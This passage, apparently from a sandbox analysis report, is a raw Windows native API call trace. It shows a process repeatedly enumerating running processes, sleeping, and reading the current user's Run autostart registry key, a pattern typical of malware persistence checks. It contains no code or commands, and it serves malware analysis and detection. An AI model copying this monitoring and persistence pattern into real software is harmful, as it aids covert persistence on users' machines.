(in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0172.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0172.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.106] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.108] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.108] NtClose (Handle=0x274) returned 0x0 [0173.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.125] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.278] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.280] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.280] NtClose (Handle=0x274) returned 0x0 [0173.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.295] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.316] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.317] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.317] NtClose (Handle=0x274) returned 0x0 [0173.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.320] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.320] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.398] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.408] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.453] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.454] NtClose (Handle=0x274) returned 0x0 [0173.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.464] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.468] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.470] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.470] NtClose (Handle=0x274) returned 0x0 [0173.470] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.479] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.479] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.486] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.490] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.492] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.492] NtClose (Handle=0x274) returned 0x0 [0173.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.512] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.513] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.513] NtClose (Handle=0x274) returned 0x0 [0173.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.549] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.551] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.551] NtClose (Handle=0x274) returned 0x0 [0173.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.560] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.563] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.564] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.564] NtClose (Handle=0x274) returned 0x0 [0173.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.578] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.586] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.587] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.587] NtClose (Handle=0x274) returned 0x0 [0173.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.596] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.599] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.601] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.606] NtClose (Handle=0x274) returned 0x0 [0173.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.616] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.617] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.619] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.619] NtClose (Handle=0x274) returned 0x0 [0173.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.638] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0173.639] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0173.639] NtClose (Handle=0x274) returned 0x0 [0173.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0173.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0173.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0173.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0173.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0173.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0173.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0173.652] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: 